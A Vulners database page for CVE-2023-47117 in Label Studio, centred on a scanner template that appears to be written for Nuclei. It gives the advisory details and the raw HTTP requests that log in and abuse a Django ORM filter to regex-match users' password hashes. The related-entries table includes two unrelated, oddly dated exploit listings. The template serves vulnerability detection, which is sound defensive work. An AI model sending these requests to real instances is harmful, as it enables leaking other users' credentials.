| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| Exploit for CVE-2017-17562 | 5 Feb 201605:24 | – | githubexploit | |
| Exploit for CVE-2017-17562 | 5 Feb 201605:24 | – | githubexploit | |
| CVE-2023-47117 | 13 Nov 202317:01 | – | circl | |
| Label Studio Security Vulnerability | 13 Nov 202300:00 | – | cnnvd | |
| CVE-2023-47117 | 13 Nov 202320:13 | – | cve | |
| CVE-2023-47117 Object Relational Mapper Leak Vulnerability in Filtering Task in Label Studio | 13 Nov 202320:13 | – | cvelist | |
| Label Studio Object Relational Mapper Leak Vulnerability in Filtering Task | 14 Nov 202318:27 | – | github | |
| CVE-2023-47117 | 13 Nov 202321:15 | – | nvd | |
| CVE-2023-47117 Object Relational Mapper Leak Vulnerability in Filtering Task in Label Studio | 13 Nov 202320:13 | – | osv | |
| GHSA-6HJJ-GQ77-J4QW Label Studio Object Relational Mapper Leak Vulnerability in Filtering Task | 14 Nov 202318:27 | – | osv |
id: CVE-2023-47117
info:
name: Label Studio - Sensitive Information Exposure
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django's Object Relational Mapper (ORM). Since the results of query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character.
impact: |
Unauthenticated attackers can leak sensitive user information including passwords character-by-character by exploiting Django ORM filter chains.
remediation: |
Upgrade Label Studio to a patched version that addresses the ORM filter vulnerability.
reference:
- https://security.snyk.io/vuln/SNYK-PYTHON-LABELSTUDIO-6056277
- https://nvd.nist.gov/vuln/detail/CVE-2023-47117
- https://github.com/elttam/publications
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-47117
cwe-id: CWE-200
epss-score: 0.04055
epss-percentile: 0.89418
cpe: cpe:2.3:a:humansignal:label_studio:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
vendor: humansignal
product: label_studio
shodan-query: http.favicon.hash:-1649949475
tags: cve,cve2023,label_studio,oss,exposure,authenticated,vuln
variables:
Task_id: "{{task}}"
Project_id: "{{project}}"
http:
- raw:
- |
GET /user/login/ HTTP/1.1
Host: {{Hostname}}
- |
POST /user/login/?next=/projects/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrfmiddlewaretoken={{csrf}}&email={{username}}&password={{password}}&persist_session=on
- |
PATCH /api/dm/views/{{Task_id}}?interaction=filter&project={{Project_id}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"id":{{Task_id}},"data":{"title":"Tasks","ordering":[],"type":"list","target":"tasks","filters":{"conjunction":"or","items":[{"filter":"filter:tasks:updated_by__active_organization__active_users__password","operator":"regex","value":"^pbkdf2_sha256\\$260000\\$","type":"String"}]},"hiddenColumns":{"explore":[],"labeling":[]},"columnsWidth":{},"columnsDisplayType":{},"gridWidth":4,"search_text":null},"project":"{{Project_id}}"}
- |
GET /api/tasks?page=1&page_size=30&view={{Task_id}}&interaction=filter&project={{Project_id}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body_4, "completed_at", "file_upload", "annotators")'
- 'status_code_3==200 && status_code_4==200'
- 'contains(header_4, "application/json")'
condition: and
extractors:
- type: regex
part: body
name: csrf
group: 1
regex:
- 'me="csrfmiddlewaretoken" value="([a-zA-Z0-9]+)">'
internal: true
# digest: 4a0a00473045022100872bb11f62a970c031d4f3af583dabc2d5500d9a182859d882eeb71108e7ae4c022055058b91a93abca1386a987acc06299a6e2e93cd4fd22b636fe92192f29faf14:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation